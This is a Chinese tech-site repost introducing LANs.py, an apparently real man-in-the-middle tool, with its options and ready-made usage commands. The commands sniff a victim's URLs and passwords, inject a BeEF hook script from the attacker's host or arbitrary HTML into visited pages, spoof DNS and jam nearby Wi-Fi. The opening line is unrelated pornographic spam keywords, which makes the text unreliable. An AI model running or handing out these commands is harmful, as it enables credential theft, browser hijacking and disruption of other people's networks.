自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

LANs.py:一款可以實(shí)現(xiàn)代碼注入,無(wú)線滲透和WiFi用戶監(jiān)控的強(qiáng)大工具

新聞 前端
LANs.py會(huì)自動(dòng)尋找當(dāng)前網(wǎng)絡(luò)中最為活躍的WLAN用戶,并對(duì)其中的一名用戶實(shí)施監(jiān)控,然后向該用戶所訪問(wèn)的Web頁(yè)面注入任意HTML或JavaScript代碼。

 [[203988]]

LANs.py功能簡(jiǎn)介

1.      自動(dòng)尋找當(dāng)前網(wǎng)絡(luò)中最為活躍的WLAN用戶,并對(duì)其中的一名用戶實(shí)施監(jiān)控,然后向該用戶所訪問(wèn)的Web頁(yè)面注入任意HTML或JavaScript代碼;

2.      干擾附近的WiFi網(wǎng)絡(luò),干擾范圍取決于無(wú)線網(wǎng)卡的性能。我們可以通過(guò)修改配置來(lái)實(shí)現(xiàn)干擾所有人的WiFi信號(hào)或僅干擾某一特定用戶的WiFi信號(hào)。但是LANs.py不支持對(duì)用戶同時(shí)進(jìn)行WiFi干擾和監(jiān)聽(tīng)。

依賴組件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標(biāo)用戶的IP地址,那么你還需要一塊支持混雜模式的無(wú)線網(wǎng)卡)

測(cè)試環(huán)境為Kali Linux,發(fā)動(dòng)攻擊的設(shè)備地址為192.168.0.5,目標(biāo)設(shè)備的IP地址為192.168.0.10。

所有的可選操作項(xiàng):

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前該工具支持從以下協(xié)議收集數(shù)據(jù):HTTP、FTP、IMAP、POP3和IRC。LANs.py將會(huì)打印出URL地址所返回的資源中前135個(gè)字符,并自動(dòng)忽略結(jié)尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協(xié)議下傳輸?shù)挠脩裘?密碼、以及接收或發(fā)送的電子郵件和IRC消息。

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:查看所有的圖片

-ip:設(shè)置目標(biāo)IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目標(biāo)用戶所訪問(wèn)的頁(yè)面中注入一個(gè)BeEF鉤子( http://beefproject.com/ ,【 參考教程 】),注入的參數(shù)會(huì)包裹在<script>標(biāo)簽中,所以你可以在一個(gè)JavaScript文件中的任意位置輸入內(nèi)容。

python LANs.py -c'<title>Owned.</title>'

向目標(biāo)用戶所訪問(wèn)的頁(yè)面中注入任意HTML代碼。工具首先會(huì)嘗試在第一個(gè)<head>標(biāo)簽之后注入內(nèi)容,如果失敗則嘗試在第一個(gè)</head>標(biāo)簽之前注入內(nèi)容。上面給出的示例代碼會(huì)將頁(yè)面標(biāo)題(title)修改為’Owned.’。

讀取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

為了成功讀取pcap文件中的內(nèi)容,你需要使用-ip參數(shù)指定目標(biāo)IP。該功能的一個(gè)優(yōu)點(diǎn)就是用戶無(wú)需使用root權(quán)限便可執(zhí)行該腳本。

DNS欺騙:

python LANs.py -a -r 80.87.128.67

-a選項(xiàng)將會(huì)對(duì)目標(biāo)發(fā)出的每一次DNS請(qǐng)求進(jìn)行欺騙攻擊,并將用戶請(qǐng)求重定向至-r參數(shù)所制定的地址。無(wú)論用戶在地址欄中輸入的是什么地址,他們都將會(huì)被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

該命令將會(huì)對(duì)域名eff.org及其子域名進(jìn)行DNS欺騙。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干擾所有的WiFi網(wǎng)絡(luò):

python LANs.py --jam

僅干擾指定接入點(diǎn):

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用選項(xiàng)

常規(guī)使用:

-b BEEF_HOOK_URL:將BeEF hookURL注入到目標(biāo)用戶所訪問(wèn)的每一個(gè)頁(yè)面中,例如-b http://192.168.1.10:3000/hook.js 。

-c ‘HTML CODE’:向目標(biāo)用戶訪問(wèn)的頁(yè)面中注入任意HTML代碼。

-d:查看目標(biāo)用戶訪問(wèn)的圖片。

-dns DOMAIN:對(duì)指定DNS域名進(jìn)行DNS欺騙攻擊,例如-dnsfacebook.com。

-a:對(duì)用戶的所有DNS請(qǐng)求進(jìn)行DNS欺騙攻擊。

-r IPADDRESS: 僅用于-dnsDOMAIN選項(xiàng)。

-u:打印出目標(biāo)用戶所使用的URL地址。

-i INTERFACE: 指定接口,例如-i wlan0。

-ip:指定目標(biāo)IP地址。

-n: 對(duì)目標(biāo)執(zhí)行nmap掃描。

-na:在后臺(tái)對(duì)目標(biāo)執(zhí)行更具攻擊性的nmap掃描,并將掃描結(jié)果輸出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP協(xié)議下傳輸?shù)挠脩裘?密碼、以及接收或發(fā)送的電子郵件和IRC消息。

-pcap PCAP_FILE: 解析pcap文件中所有的數(shù)據(jù)包; 需要輸入-ip[target's IP address]參數(shù)。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:對(duì)2.4GHz無(wú)線接入點(diǎn)以及客戶端進(jìn)行干擾攻擊。

WiFi干擾:

-sMAC_Address_to_skip:指定需跳過(guò)的MAC地址。

-m MAXIMUM: 指定攻擊客戶端的最大數(shù)量。

-t TIME_INTERVAL: 設(shè)置攻擊間隔。

–packets NUMBER:指定每一次攻擊中發(fā)送的數(shù)據(jù)包數(shù)量。

–accesspoint ROUTER_MAC:輸入目標(biāo)AP的MAC地址。

* 參考來(lái)源: DanMcInerney , FB小編Alpha_h4ck編譯,轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM

責(zé)任編輯:張燕妮 來(lái)源: FreeBuf.COM
相關(guān)推薦

2017-02-27 17:42:26

LinuxCPU工具

2023-03-31 07:59:02

2022-01-24 16:17:26

htop工具Linux

2020-08-26 19:15:56

Python工具

2023-09-21 11:48:49

CodeGeeXAI代碼

2020-12-24 17:08:52

安全工具NoSql注入接口工具

2023-10-08 07:51:07

HInvoke項(xiàng)目函數(shù)

2021-07-09 10:14:05

IP工具命令

2021-03-25 16:15:24

SQL工具慢查詢

2011-01-18 14:51:48

2022-02-10 08:18:11

WiFi安全測(cè)試工具Wi-Fi Fram

2023-10-10 07:08:42

2020-12-15 07:54:40

工具Hutoolgithub

2020-12-15 15:08:17

工具Java線程

2021-04-09 09:09:35

網(wǎng)絡(luò)工具netwox Python

2021-11-11 11:39:39

MailRipV2SMTP安全工具

2020-12-10 10:00:59

監(jiān)控Java可視化

2020-12-22 10:30:47

Nagios工具監(jiān)控

2022-01-16 06:48:42

Jektor測(cè)試工具安全工具

2022-09-30 13:09:32

VSLookVS Code工具
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)